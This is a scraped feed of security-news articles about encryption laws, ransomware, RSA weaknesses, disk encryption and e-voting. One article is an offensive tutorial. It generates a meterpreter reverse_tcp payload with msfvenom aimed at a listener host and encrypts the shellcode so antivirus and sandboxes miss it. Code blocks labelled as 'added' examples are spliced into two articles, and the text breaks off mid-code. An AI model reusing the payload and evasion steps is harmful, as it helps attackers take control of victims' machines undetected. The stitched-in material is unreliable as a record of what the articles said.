Information Security News|Cyber Security|Hacking Tutorial
https://www.securitynewspaper.com/
Tue, 18 Apr 2023 22:19:16 +0000

UK government new bill proposes to remove encryption from WhatsApp and Signal
https://www.securitynewspaper.com/2023/04/18/uk-government-new-bill-proposes-to-remove-encryption-from-whatsapp-and-signal/
Tue, 18 Apr 2023 22:19:13 +0000

WhatsApp, owned by Meta, has threatened to quit the United Kingdom in the event that the government adopts the Online Safety Bill, claiming that the bill would effectively remove its encryption mechanisms. The firm, along with its competitor company Signal and five other applications, said that, in the event that the bill is signed into law, users would no longer be secured by end-to-end encryption. This kind of encryption assures that no one other than the receiver can read any communications that have been delivered.

The “Online Safety Bill” was initially intended to criminalize material inciting self-harm that was posted to social media platforms like Facebook, Instagram, TikTok, and YouTube, but it was later altered to concentrate more generally on illegal content relating to adult and child safety. Although government representatives have said that the measure would not prohibit end-to-end encryption, the messaging applications have stated in an open letter that “The bill provides no explicit protection for encryption.”


The letter goes on to say that the bill, if implemented in its current form, “could empower OFCOM [the Office of Communications] to try to force the proactive scanning of private messages on end-to-end encrypted communication services, thereby nullifying the purpose of end-to-end encryption and compromising the privacy of all users.” According to WhatsApp and Signal, OFCOM is a government-approved institution that is entrusted with regulating broadcast, telecommunications, and postal services in the UK. However, if the bill is passed, OFCOM might misuse its ability to scrutinize individual chats and spy on users without their knowledge.

“In a nutshell, the bill poses an unprecedented threat to the privacy, safety, and security of every citizen of the United Kingdom and the people with whom they communicate around the world, while also providing encouragement to adversarial governments that may seek to draft copycat laws.” Signal has said in a statement on Twitter that it will “not back down on providing private, safe communications,” in response to the open letter that encourages the government of the United Kingdom to rethink the way that the law is presently drafted. Both businesses have said that they would stop supporting the applications in the United Kingdom rather than take the risk of lowering their present encryption standards. They have stuck by their statements.

WhatsApp is regarded as the number one most-used encryption app, having garnered more than two billion monthly active users in the previous years. In light of the fact that WhatsApp is used all over the world, the company believes that its fears are well-founded. It explains in the letter that it is impossible to continue providing end-to-end encryption services while the UK government is expanding its monitoring of the applications. In the letter, WhatsApp and Signal said that they are not the only ones that have concerns about the UK Bill and that these worries are shared by others. The United Nations has issued a stern warning, stating that the attempts made by the United Kingdom’s government to enforce backdoor restrictions represent “a paradigm shift that presents a variety of major difficulties with possibly disastrous implications.”

The Online Safety Bill aims to address what lawmakers consider a major concern of child abuse and child sexual abuse material going unregulated in the UK. It also targets pornographic deepfakes, criminalizes encouraging self-harm, and requires social media sites to more strictly enforce their terms of service. The law makes it clear that any communications that violate its criteria would be subject to monitoring by the government. Paying a kid for sexual services, instigating the development of material depicting child sexual abuse, or organizing or acquiring material depicting child sexual abuse are all examples of these types of crimes.

Free decryption tool for TaRRaK ransomware. How to recover your infected files?
https://www.securitynewspaper.com/2022/06/07/free-decryption-tool-for-tarrak-ransomware-how-to-recover-your-infected-files/
Tue, 07 Jun 2022 16:45:51 +0000

Avast researchers developed a decryption tool for the TaRRaK ransomware, a malware variant detected in mid-2021 and characterized by multiple errors in its coding and encryption process. Thanks to this tool, victims will be able to recover their encrypted files without negotiating with TaRRaK operators.

Before learning about the decryption tool, let’s take a look at some details on the development of the ransomware, its encryption process and the mistakes made by its creators.

Development & behavior

TaRRaK is written in .NET and its code is not protected with obfuscation or any other evasion method. When executed, the ransomware creates a mutex identified as TaRRaK to ensure that only one instance of the malware runs, and creates an auto-start registry entry so that the ransomware runs on each login to the target system.

The ransomware contains a list of 178 file extensions.

After avoiding folders with strings such as $Recycle.Bin, :\Windows, \Program Files, \Local\Microsoft\, and :\ProgramData\, the encrypted files receive the .TaRRaK file extension.

Flaws in encryption

The source code and encryption process are riddled with bugs:

The malware sample attempts to read the entire file into memory using File.ReadAllBytes(). This function has an internal limit of 2 GB of data that can be loaded; if the file is larger, the function throws an exception, which is then caught by a try-catch block that only handles a permission denied condition.

In that case, TaRRaK adds an ACL entry that grants full access to everyone and retries the data read operation. If any other error occurs, the exception is rethrown and the ransomware enters an infinite loop.

Even if the load operation is successful and the data from the file fits in memory, the Encrypt function converts the byte array to an array of 32-bit integers.

The malware allocates another block of memory with the same size as the file and then performs an encryption operation, using a custom encryption algorithm. The encrypted Uint32 array is converted to another byte array and written to the file. Therefore, in addition to the memory allocation for the data in the original file, two additional blocks are allocated; if any of the memory allocations fails, an exception is thrown and the ransomware loops again.

In the unusual scenarios where the ransomware manages to complete the encryption process without errors, a ransom note appears in the root folder of the compromised drives, and an advertisement is displayed on the user’s desktop.

Decryption tool

Avast specialists detailed the process to decrypt files infected with TaRRaK ransomware:

  • Log in to the same account as the affected user
  • Download the free Avast decryptor for Windows 32-bit or 64-bit
  • Run the downloaded file
  • On the home page, after reading the license information, click “Next”
  • On the next page, select the list of locations where you want to apply decryption. By default, the tool contains a list of all local drives.
  • You can choose to back up the encrypted files in case something goes wrong during the decryption process. Finally, click “Decrypt” to recover your information.
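
Before running the decryptor, it helps to know exactly which files were encrypted and to hold an independent, verified copy of them. The following Python script is an added example, not Avast's tool or code from the original article: it inventories files carrying the .TaRRaK extension, skips the folder strings the article lists as avoided by the ransomware, and copies each file to a backup location with a SHA-256 check. The function names, the manifest format and the sample tree are assumptions made for illustration.

```python
import hashlib
import json
import os
import shutil
import tempfile
from pathlib import Path

ENCRYPTED_SUFFIX = ".tarrak"  # extension named in the article, matched case-insensitively
# Path strings the article says the ransomware avoids, so nothing there is encrypted.
AVOIDED = ("$recycle.bin", ":\\windows", "\\program files",
           "\\local\\microsoft\\", ":\\programdata\\")


def is_avoided(path_str):
    """True if the path contains one of the strings the ransomware skips."""
    normalized = str(path_str).replace("/", "\\").lower()
    return any(fragment in normalized for fragment in AVOIDED)


def sha256_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so large files are never loaded whole into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_encrypted(root):
    """Return the sorted paths under root whose name ends in .TaRRaK."""
    found = []
    # os.walk skips directories it cannot list, so one locked folder does not stop the scan.
    for current, dirs, files in os.walk(root):
        # Prune avoided folders in place so the walk does not descend into them.
        dirs[:] = [d for d in dirs
                   if not is_avoided(os.path.join(current, d) + os.sep)]
        for name in files:
            if name.lower().endswith(ENCRYPTED_SUFFIX):
                found.append(Path(current) / name)
    return sorted(found)


def backup_encrypted(root, dest):
    """Copy every encrypted file to dest, verify each copy, write manifest.json."""
    root, dest = Path(root).resolve(), Path(dest).resolve()
    if dest == root or root in dest.parents:
        raise ValueError("backup destination must be outside the scanned tree")
    manifest = []
    for source in find_encrypted(root):
        target = dest / source.relative_to(root)
        entry = {"source": str(source), "backup": str(target)}
        try:
            target.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(source, target)
            entry["size"] = source.stat().st_size
            entry["sha256"] = sha256_file(source)
            entry["verified"] = sha256_file(target) == entry["sha256"]
        except OSError as exc:  # unreadable file: record it and keep going
            entry["verified"] = False
            entry["error"] = str(exc)
        manifest.append(entry)
    dest.mkdir(parents=True, exist_ok=True)
    (dest / "manifest.json").write_text(json.dumps(manifest, indent=2))
    return manifest


if __name__ == "__main__":
    # Constructed sample tree standing in for an affected drive (file names are made up).
    with tempfile.TemporaryDirectory() as work:
        drive, vault = Path(work, "drive"), Path(work, "vault")
        (drive / "Users" / "alice").mkdir(parents=True)
        (drive / "Program Files").mkdir()
        (drive / "Users" / "alice" / "report.docx.TaRRaK").write_bytes(b"constructed ciphertext")
        (drive / "Users" / "alice" / "notes.txt").write_bytes(b"untouched")
        (drive / "Program Files" / "app.cfg.TaRRaK").write_bytes(b"never visited")
        for item in backup_encrypted(drive, vault):
            print(item["verified"], item["size"], item["source"])
```

Point the backup destination at a drive that is not in the decryptor's list of locations, and keep manifest.json with the incident record so the restored files can be compared against it later.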

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

Vulnerability in next-generation homomorphic encryption allows data to be stolen even while encrypted
https://www.securitynewspaper.com/2022/03/03/vulnerability-in-next-generation-homomorphic-encryption-allows-data-to-be-stolen-even-while-encrypted/
Thu, 03 Mar 2022 17:16:13 +0000

Cybersecurity specialists report the detection of a critical vulnerability in homomorphic encryption, one of the most advanced security technologies today. According to the report, the flaw would allow threat actors to steal data even during the encryption process.

This variant of encryption allows data to be encrypted so that third parties cannot read it, although it does allow third parties and third-party technologies to perform operations using the protected data. For example, a user could use homomorphic encryption to upload sensitive data to a cloud deployment to perform data analysis; cloud solutions could perform the analyses and send the resulting information to the user without reading the sensitive data.

Aydin Aysu, an expert at North Carolina State University in charge of the research, says, “Homomorphic encryption is attractive because it preserves data privacy, but allows users to make use of that information, even though it requires a lot of computing resources.” Given the large amount of hardware and software resources required, this is not a practical implementation.

Microsoft has excelled in the development of homomorphic encryption, creating the SEAL Homomorphic Encryption Library to facilitate research among the specialized community. Aysu’s report notes that there is a way to crack homomorphic encryption using the SEAL library through a side-channel attack.

According to the report, the researchers detected this vulnerability at least in SEAL versions prior to 3.6: “This library receives constant updates, so it is likely that the flaw will be corrected in later iterations, although it is also not ruled out that later versions remain exposed to this vulnerability.”

Finally, experts point out that side-channel attacks are a widely documented hacking variant, so organizations with adequate security protocols should have no problem containing this threat: “With the advancement of homomorphic encryption, the computer industry must ensure that it incorporates the necessary security tools for protection against side-channel attacks and other security threats,” concludes Aysu.

The police forensic department doesn’t want to share how they hacked into secure encrypted phone networks to the court
https://www.securitynewspaper.com/2021/04/01/the-police-forensic-department-doesnt-wants-to-share-how-they-hacked-into-secure-encrypted-phone-networks-to-the-court/
Thu, 01 Apr 2021 23:35:23 +0000


A couple of months ago the French authorities detailed Operation Venetic, with which they managed to compromise the security of an account in the EncroChat encrypted messaging application, allowing law enforcement agencies across Europe to collect the evidence needed to make more than 1500 arrests. After this incident, court hearings on this communications network were expected to start, although everything started after the defense asked the French government for more information on how the authorities accessed this network.

The defense mentions that this process of presenting evidence has been complicated because the prosecution does not have the necessary knowledge to understand the information contained in the documents related to the EncroChat hacking. Moreover, it is anticipated that this will be the defense’s main argument, which calls into question the legality and admissibility of evidence obtained from encrypted communications on this network.

The British authorities made hundreds of arrests thanks to information obtained from this operation, so the UK National Crime Agency (NCA) has recommended that courts prepare to receive at least 400 similar appeals.

Jonathan Kinnear, specialist in the Organized Crime Division of the Crown Prosecutor’s Office, mentions that the prosecution was already working to process requests from defense attorneys: “We have been working to respond to all these requests, analyzing the characteristics of the disclosure of this information that some consider to be a secret not subject to being presented as evidence.”

The defense is even raising new questions about the ability of the French authorities to break security on such platforms, even though police agencies in the Netherlands and Belgium recently claimed to have compromised the security of Sky ECC, another encrypted communications platform. In a joint report, the authorities of these countries claimed to have accessed more than one billion encrypted messages from this network, which would also have allowed multiple arrests to be made.

In addition to questioning these practices, the defense argued that the compromise of these files would constitute a violation of the fundamental rights of the accused.

Since the leaks revealed by former US National Security Agency (NSA) employee Edward Snowden, it is a well-known and well-documented fact that the governments of multiple countries invest millions in developing tools and software capable of breaking security mechanisms in encrypted communication systems.

Internal documentation of the NSA has suggested that this agency has already compromised at least one encrypted communication system, although there is no mention of the allegedly compromised platform.

A method to possibly break RSA encryption algorithm is revealed
https://www.securitynewspaper.com/2021/03/04/a-method-to-possibly-break-rsa-encryption-algorithm-is-revealed/
Thu, 04 Mar 2021 20:21:24 +0000

A renowned German researcher claims that the RSA algorithm was broken by cryptographic analysis specialists, which can represent a breakthrough in the field of mathematics or a cybersecurity risk.

The one-way functions that form the basis of most algorithms depend on the difficulty of solving some problems even with access to a computer with high processing capabilities. RSA security, for example, is based on the difficulty of factoring the product of two large prime numbers.

As you may remember, the RSA cryptographic system relies on integer factoring and since its release has become one of the most widely used resources for digital encryption. Other types of cryptography use elliptic curves to create a one-way function that cannot be inverted except through a brute force attack that involves testing as many keys as possible.

Claus Schnorr, a mathematician and cryptographer, mentions that prime factorization can be reduced to a shortest vector problem, which could be easier to solve. The premise of his research, entitled “Fast Factoring Integers in SVP Algorithms,” is that this process could destroy RSA encryption.

If verified, this technique would work even if longer encryption keys are used. It should be remembered that increasing the length of the encryption key is a common response to ensure that algorithms remain in place in the complex world of computing.

The problem is that, if this method made the decryption process trivial, a lot of systems considered secure that depend on RSA would become unsafe or at least vulnerable to all kinds of known or unknown attacks.

Cryptography specialist Matthew Green commented, “I think the general consensus is that this is an exciting approach that, unfortunately, right now has no practical evidence of effectiveness, and associating a particular researcher’s name with it should not be seen as a real change.”

As Green mentions, this decryption method has not yet been extensively demonstrated, much less tested in real or controlled environments, although for many this is a clear alarm signal for organizations to try to reinforce potential weaknesses before cybercriminals take advantage of these flaws.

How to encrypt a hard drive in Windows 10 in two simple ways
https://www.securitynewspaper.com/2020/11/24/how-to-encrypt-a-hard-drive-in-windows-10-in-two-simple-ways/
Tue, 24 Nov 2020 15:51:10 +0000

Encrypting a hard drive is a great way to protect a computer’s data. This will require a password each time a user wants to access data, in the same way that they sign in to an email platform or social media service.

This time, specialists from the International Institute of Cyber Security (IICS) will show you how to encrypt a hard drive and protect your data from any threat actor. Encryption is good as the first line of defense, because if someone steals your laptop and manages to remove the hard drive, they will have trouble accessing the information. Encryption can also be implemented at folder and file level.

ENCRYPTION WITH WINDOWS SYSTEM TOOLS

BitLocker Device Encryption is Microsoft’s encryption tool built into Windows 10 Pro and Enterprise. Although it works, BitLocker has several disadvantages:

  • If BitLocker was not pre-installed on your computer, installation and configuration can be difficult
  • BitLocker functions may differ on different devices; it all depends on your motherboard
  • As mentioned above, BitLocker only works with Windows 10 Professional and Enterprise

Luckily there are several alternatives. VeraCrypt is an option that is not affected by the drawbacks of BitLocker:

  • It’s much easier to install than BitLocker
  • It’s independent of your computer’s hardware
  • Works on any version of Windows 10

VeraCrypt is free and open source software that is also considered more secure by the cybersecurity community in general. After installing VeraCrypt, you will only need to enter your password each time you start your computer.

HOW TO INSTALL VERACRYPT

Installing VeraCrypt is a relatively complicated process and there is even the possibility of losing files if any step is done wrong. IICS specialists recommend carefully reading the installation instructions before starting the process. If you do not feel sure that you can apply the process correctly, it is recommended to try to install the tool.

INSTALLATION ON WINDOWS 10

  • You will need a USB stick to save VeraCrypt Emergency Disk Recovery. Take a USB stick and format it in FAT or FAT32 so it’s ready when you need it
  • You will also need a program to unzip files
  • Go to the VeraCrypt download page and search for the Windows installer
  • Run the VeraCrypt installation, leave all items as default. In the first window, you can select the installation language
  • After a while, the message “VeraCrypt was successfully installed” appears
  • Click OK, and then click Finish to complete the installation. VeraCrypt will then display a message
  • If you have never used VeraCrypt, it is best to follow this tutorial. Click Yes to view the guide or No to skip. Anyway, we’ll show you the rest of the steps in this article
  • Run VeraCrypt, then select the System menu, then Encrypt System Partition/Disk
  • The “Veracrypt Volume Creation Wizard” window will then appear. You will need to choose the encryption type: NORMAL or HIDDEN. Normal only encrypts the entire system. This is what we want, so select that option
  • The program will ask if only the Windows system partition or the entire drive should be encrypted. If you have multiple partitions with important data, you can encrypt the entire drive. If you only have one partition on disk (like us), there will be an option: “Encrypt windows system partition”. Select this item and click Next
  • The next window is “Number of operating systems”. If you have multiple operating systems, choose Multiple Boot. Otherwise, choose Single Boot. Click Next
  • The encryption settings window will then appear. We recommend that you choose AES for encryption and SHA-256 for hashing. Both are widely used algorithms
  • The next step will be to create a password. It is better to choose a reliable one to protect the system from any hacking attempt. Many password managers (such as Bitwarden) have tools to generate strong passwords automatically. VeraCrypt will alert you if your password is not secure enough
  • The following is the collection of random data. You will need to move the mouse randomly within the window. This increases the strength of encryption keys. Once the indicator at the bottom of the window is full, proceed to the next step
  • Then the “Generated Keys” window will appear. Here you just need to click on the “Next” button.
  • You must then create a recovery disk. You can skip creating a physical recovery disk, but this is not a recommended measure. Note where the backup ZIP image will be stored, then click Next
  • If you did not skip creating a recovery disk in the previous step, you will need to address it now. VeraCrypt doesn’t say how to do this, but we’ll explain it below. You will need to use the USB stick that was formatted at the start of the process; insert it into your computer and navigate to the directory where VeraCrypt stores ZIP images. Use 7-zip (or any other decompression program) to extract the files from the “VeraCrypt Rescue Disk.zip” file to the root of your USB drive. When finished, click Next to have VeraCrypt verify that the copy is correct
  • If all went well, you will see a message box mentioning “Verified Recovery Disk”. Remove the USB stick and go to the next step
  • The next step shows the cleaning mode window. Normally, there is nothing to do with this function. Make sure it’s set to No (faster) and click Next
  • The System Encryption Pre-Test window appears. VeraCrypt will now check if encryption works on your system. Click Test to see how this happens. Note that VeraCrypt will probably show you a few more similar warnings before you actually run the test, so be prepared for that
  • If everything went well, the computer will restart and you will see a window like the following screenshot

IICS experts recommend backing up all important files before starting this process. This will allow you to recover them if something serious happens in the middle of the encryption process, such as a blackout or system failure.

If you are completely sure that the process completed successfully, press ENCRYPT. VeraCrypt will show you some documents that you may want to print or save as PDF; this information is important so please do not ignore it.

If the encryption has been successful, remember that you will now need to enter your password each time you try to access the system.

Zoom sued by U.S. government for lying about its end-to-end encryption in video calls
https://www.securitynewspaper.com/2020/11/10/zoom-sued-by-u-s-government-for-lying-about-its-end-to-end-encryption-in-video-calls/
Tue, 10 Nov 2020 20:23:10 +0000

The U.S. Federal Trade Commission (FTC) filed a lawsuit claiming that the video conferencing platform Zoom has been lying to its users about the security of its end-to-end encryption at least since 2016. Although Zoom has already reached an agreement on these allegations, media reports indicate that the platform will not pay any compensation to users affected by these practices.

In its internal documentation and advertising, Zoom claims to have 256-bit end-to-end encryption. However, the constant scrutiny of the security of this platform showed that these claims were false, as Zoom provides a much lower level of security, potentially compromising millions of users.


The FTC argues that the level of encryption Zoom uses is much lower than promised, so the company is committed to upgrading its systems and improving its user protection mechanisms. It is important to remember that the number of users of the company increased to almost 300 million people during the most recent months due to the pandemic.

“Zoom’s claims are misleading and harm users who have turned to this platform at a time as complex as the current one,” the FTC complaint adds. As part of the agreement between developers and authorities, Zoom will need to establish a system that actually complies with what its advertising documents mention. In other words, the platform will implement 256-bit end-to-end encryption as soon as possible.

While this new encryption is being implemented, the company will respond directly to any questions concerned users have about the security of the platform.

Mac users were recently found to face a similar encryption issue related to “ZoomOpener”, which was installed secretly to avoid Safari security measures that open a dialog box before starting the application. The FTC is still deliberating on the case and Zoom is currently required to provide its 256-bit end-to-end security guarantee for its users.

Russia is set to ban advanced encryption technologies. Will the US follow such a measure?
https://www.securitynewspaper.com/2020/09/21/russia-is-set-to-ban-advance-encryption-technologies-will-the-us-follow-such-measure/
Mon, 21 Sep 2020 23:27:35 +0000

According to the experts of an exploit writing course, Russian authorities have presented a bill aiming to ban cryptographic algorithms and encryption methods such as TLS 1.3, ESNI, DoH and DoT. The Ministry of Digital Science proposes to ban their use throughout the Russian Federation, with the exception of cases established by law. This way, encryption protocols that allow hiding the name of a website, among other things, will be prohibited.

Experts estimate that the use of masking protocols that hide actual network device addresses from external systems is increasing in Russia, so authorities have committed to stopping the spread of this practice.

In the bill, the Ministry of Digital Science argues: “The use of these algorithms and encryption methods can reduce the efficiency of our existing filtering systems, which will cause the complex identification of resources on the Internet containing sensitive information, as well as any data source banned by the Russian Federation”.

Exploit writing course experts say that, in the event of any breach of this law, the Ministry would suspend the operation of the Internet resource used to break the law. Besides, the Ministry points out that the Unified Register of Russian Programs for Electronic Computers and Databases contains information about encryption protocols that can be used for criminal investigation purposes.

It is worth remembering that the Russian Internet operates under serious restrictions. Protocols like DoH or DoT can bypass such blocking policies by hiding a request with encryption, so Russian Internet service providers won’t be able to block a specific resource because users can hide their URL.

Reportedly, the Russian government is set to start testing its capabilities for blocking traffic encrypted with DNS over HTTPS technology; these tests were supposed to start back in May 2020, but were rescheduled due to technical issues, as reported by exploit writing course experts. The bill also states that it was prepared following a demand of the Russian Security Council dated December 4, 2019, as a plan to counter the spread of illegal information, as defined, of course, by the criteria of the Russian Federation.

TLS 1.3 is the latest version of the Transport Layer Security protocol, released back in August 2018. This version includes independent processes such as key negotiation, authentication, and cipher suites. On the other hand, DNS over TLS (DoT) is a proposed standard protocol for performing remote DNS resolution using TLS. The goal of this technique is to improve user privacy and security by preventing interception and manipulation of DNS data through Man-in-the-Middle (MiTM) attacks.

Russia online voting system vulnerabilities allow seeing who voted for whom https://www.securitynewspaper.com/2020/07/02/russia-online-voting-system-vulnerabilities-allow-seeing-who-voted-for-whom/ Thu, 02 Jul 2020 21:19:11 +0000

The post Russia online voting system vulnerabilities allow seeing who voted for whom appeared first on Information Security Newspaper | Hacking News.

Russia is in the midst of a national vote on important constitutional amendments, and this time the authorities have decided to try out an electronic voting system (e-voting) in the Moscow and Nizhny Novgorod regions, as security testing course specialists mention. The authorities say that this system will allow citizens to decrypt their own votes, giving greater confidence in this process.

This is not the first time an electronic voting system has been involved in Russian elections. In 2019, Moscow’s IT department developed a remote voting system based on blockchain technology, in which the votes were encrypted using the department’s own version of ElGamal encryption. After multiple tests, experts found several vulnerabilities in the encryption system.

In this new system, the voter’s ballot is encrypted with the help of TweetNaCl.js, a JavaScript library developed by a researcher named Dmitry Chestnykh, who discovered that the developers of Russia’s remote electronic voting system were using his framework.

Greater security when voting?

The previous system encrypted each vote individually, using a unique secret key. Therefore, to decrypt a vote, one had to obtain the secret key of the recipient, in this case the electoral committee. The new system, on the other hand, issues a shared key for the sender and recipient, in this case the voter and the electoral committee, which can be used both to encrypt the vote and to decrypt it, as mentioned by security testing course experts.

To test the new system, Meduza researchers conducted an experiment on an electronic ballot that was issued with Google Chrome, discovering that obtaining the secret key is relatively easy. According to the experts, it was possible to decipher the ballot of a voter who participated in the experiment, so voters are confident that the integrity of their vote is preserved.


On the other hand, security testing course experts mention that this makes it possible to coerce votes. In theory, an employer could, in addition to verifying that its employees have voted, find out how each vote was cast. In addition, saving these encryption keys does not require an employee to have technological knowledge. For example, they might be asked to download a special extension for a browser, which replaces randomly generated keys with static ones. This would greatly simplify the task of decrypting votes, as everyone would share a single encryption key.

This same feature can be used to monitor the integrity of the vote count, in case the electoral commission refuses to disclose the encryption keys for each specific electronic ballot. For example, supporters of a particular candidate might agree to install the same browser extension, which would allow them, over the course of the voting period, to track the minimum number of votes their candidate should have during the final count.

Developers of e-voting systems could ban voters from using a shared set of encryption keys, but this would be futile. According to the developer of this framework, there are multiple ways to circumvent such security controls, including browser extensions that write seemingly random encryption keys that can be restored at a later date. “An extension could simply save the keys to a central database,” Chestnykh also suggested. “The Curve25519 algorithm is very fast, so deciphering millions of votes would be easy.”

For further reports on vulnerabilities, exploits, malware variants and computer security risks, it is recommended to enter the website of the International Institute of Cyber Security (IICS), as well as the official platforms of technology companies.

Generate Shellcode to Bypass the AVs, VMs, and Sandboxes https://www.securitynewspaper.com/2020/05/20/generate-shellcode-to-bypass-the-avs-vms-and-sandboxes/ Thu, 21 May 2020 04:08:24 +0000

The post Generate Shellcode to Bypass the AVs, VMs, and Sandboxes appeared first on Information Security Newspaper | Hacking News.

Introduction

Shellcode is the next phase after successfully finding an exploit. Every hacker needs shellcode to compromise the target, and your shellcode determines how much control you get over the victim. Shellcode encryption also plays a big role in hiding malware from antivirus, VMs and sandboxes.

Today we will walk you through a technique to encrypt your shellcode; similar techniques are used by researchers of the International Institute of Cyber Security to test malware in labs.

Environment

  • OS: Kali Linux 2019.3 64bit
  • Kernel-Version: 5.2.0

Installation Steps

root@kali:/home/iicybersecurity# git clone https://github.com/ReddyyZ/GhostShell
Cloning into 'GhostShell'...
remote: Enumerating objects: 27, done.
remote: Counting objects: 100% (27/27), done.
remote: Compressing objects: 100% (27/27), done.
remote: Total 185 (delta 15), reused 0 (delta 0), pack-reused 158
Receiving objects: 100% (185/185), 4.49 MiB | 1.60 MiB/s, done.
Resolving deltas: 100% (91/91), done.
  • Use the cd command to enter the GhostShell directory.
root@kali:/home/iicybersecurity# cd GhostShell/
root@kali:/home/iicybersecurity/GhostShell#
  • msfvenom is a command-line tool used to generate and output different types of shellcode.
  • Now, let’s generate shellcode using msfvenom. Use this command to generate shellcode.
    • msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=80 -f c
GhostShell – Shell code
  • We successfully generated shellcode
  • Now, use this command to compile the github project code file.
    • gcc -m32 -fno-stack-protector -z execstack encrypt_shellcode.c -o encrypt_shellcode
  • After running this command, the encrypt_shellcode file is generated. Use the ls command to view the file.
root@kali:/home/iicybersecurity/GhostShell# gcc -m32 -fno-stack-protector -z execstack encrypt_shellcode.c -o encrypt_shellcode
root@kali:/home/iicybersecurity/GhostShell# ls
assets encrypt_shellcode encrypt_shellcode.c LICENSE main.c main.h README.md
  • Let’s assume that the following is our shellcode.
\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1
  • Now, we can encrypt the shellcode using this command
    • Command Format: ./encrypt_shellcode e "key" "shellcode"
    • e: encrypt the shellcode
    • key: \xde\xad\xbe\xef
root@kali:/home/iicybersecurity/GhostShell# ./encrypt_shellcode e "\xde\xad\xbe\xef" "\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
Encrypted: \x4e\xac\xbd\xee\xc7\x48\xbd\xee\xdd\xad\x81\x18\xa4\x22\x7f
  • Now, we can decrypt the shellcode using this command
    • Command Format: ./encrypt_shellcode d "key" "shellcode"
    • d: decrypt the shellcode
root@kali:/home/iicybersecurity/GhostShell# ./encrypt_shellcode d "\xde\xad\xbe\xef" "\x4e\xac\xbd\xee\xc7\x48\xbd\xee\xdd\xad\x81\x18\xa4\x22\x7f"
Decrypted: \x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1

Conclusion

We saw how we encrypt and decrypt the shellcode using the unique key. If the shellcode executes on the victim’s machine it is undetected on the remote machine.

IIT Madras hit by ransomware. All research and exams data encrypted https://www.securitynewspaper.com/2020/02/20/iit-madras-hit-by-ransomware-all-research-and-exams-data-encrypted/ Thu, 20 Feb 2020 19:47:50 +0000

The post IIT Madras hit by ransomware. All research and exams data encrypted appeared first on Information Security Newspaper | Hacking News.

A serious incident appears to have jeopardized all the work of students, academics and researchers at the Madras Indian Institute of Technology, one of Asia’s leading technology research centers, according to data protection experts. Apparently, those affected have been infected with an unknown variant of ransomware. Although the administration claims to have backups of all the compromised information, many fear that it will be impossible to recover their research, projects, documents, reference material and so on.

One of the affected researchers shared via Twitter a screenshot of the message they received after logging into their servers, which is supposed to be a ransom note.

In this message, the hackers claim that all data stored on IIT’s systems has been encrypted and that victims have to pay a ransom to get the decryption key. To contact the attackers, victims should use nothing but the email address they provide in their message (happychoose@cock.li). “After that, you are supposed to get a decryption tool with the instructions to use it”, mentioned the affected data protection expert.

In response to massive concern, IIT’s General Secretary has asked all staff, investigators and students to back up their data: “We are under a serious attack that has compromised all computers running Windows system used in the campus. We are asking users to back up their data as soon as possible”. Besides, the campus administration fears that the attackers are targeting critical computers on IIT’s networks as an entry point to other parts of their systems, from which to deploy second-stage attacks.

Manu Zacharia, a data protection specialist, said of this incident: “This is obviously a massive ransomware attack. Attack methods used by these hackers seem to be quite sophisticated, as IIT’s servers had stopped working long before the ransomware was detected”. In addition to Zacharia’s statements, other cybersecurity firms stated that IIT is a frequent cyberattack target.

At this point, admins don’t seem to have a backup plan; nonetheless, the International Institute of Cyber Security (IICS) considers that it could be only a matter of time before the first details on the incident are known, such as the malware variant used by the attackers, their method or the sum demanded from victims.

Millions of IoT devices are hackeables due to weaknesses in RSA encryption https://www.securitynewspaper.com/2020/02/13/millions-of-iot-devices-are-hackeables-due-to-weaknesses-in-rsa-encryption/ Thu, 13 Feb 2020 22:17:38 +0000

The post Millions of IoT devices are hackeables due to weaknesses in RSA encryption appeared first on Information Security Newspaper | Hacking News.

A couple of months ago, the EUtoday website published an ethical hacking report on the security of RSA certificates, mentioning that, while this is a secure algorithm (based on calculation with prime numbers), its misuse would allow the generation of vulnerable or fake certificates, which could lead to multiple security issues. These issues also affect Internet of Things (IoT) devices, as using fake certificates could allow an attacker to deploy distributed denial of service (DDoS) attacks, information theft, and other malicious activities.

RSA certificates are an example of public key cryptography. This method uses two different encryption keys: a private key and a public key. The private key is used to decrypt messages or generate digital signatures, while the public key can encrypt data or verify digital signatures. This method is safe as long as an attacker does not know either of the two factors used for RSA calculation.

However, ethical hacking specialists consider that this assumption will not always be valid: a study of 75 million public RSA keys found that one in 172 of these keys shares a common factor.

These common factors represent a serious security issue for RSA keys, as they could allow a threat actor to determine the two prime factors used in the calculation. This information would help to derive the private key associated with the public key. In the study, researchers managed to find the private keys for more than 435k out of the 75 million RSA keys analyzed.
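An added example, not code from the study or from this article: a batch-GCD audit that a device fleet owner could run over the RSA moduli in their own certificate inventory to flag keys that share a prime and need to be regenerated. The batch-GCD method, the function names and the toy moduli are assumptions made here; the article does not say how the study computed its results.

```python
"""Fleet audit: flag RSA public moduli that share a prime factor (batch GCD)."""
from math import gcd, prod


def product_tree(values):
    """Level 0 is the input list; each higher level multiplies adjacent pairs."""
    tree = [list(values)]
    while len(tree[-1]) > 1:
        level = tree[-1]
        tree.append([prod(level[i:i + 2]) for i in range(0, len(level), 2)])
    return tree


def audit_shared_primes(moduli):
    """Return {index: verdict} for every modulus that is not coprime to the rest.

    With P the product of all moduli, gcd(n, (P mod n^2) // n) equals
    gcd(n, product of the other moduli), so one pass over a remainder tree
    replaces the quadratic number of pairwise GCDs.
    """
    tree = product_tree(moduli)
    remainders = tree.pop()                      # [P]
    while tree:                                  # walk down to the leaves
        level = tree.pop()
        remainders = [remainders[i // 2] % (n * n) for i, n in enumerate(level)]
    findings = {}
    for index, (n, r) in enumerate(zip(moduli, remainders)):
        g = gcd(n, r // n)
        if g == n:
            # Modulus reused by another key, or both of its primes seen elsewhere.
            findings[index] = "duplicate-or-fully-shared"
        elif g != 1:
            findings[index] = "shares-prime"     # exactly one prime in common
    return findings


# Constructed toy moduli (tiny primes, for illustration only; real keys are
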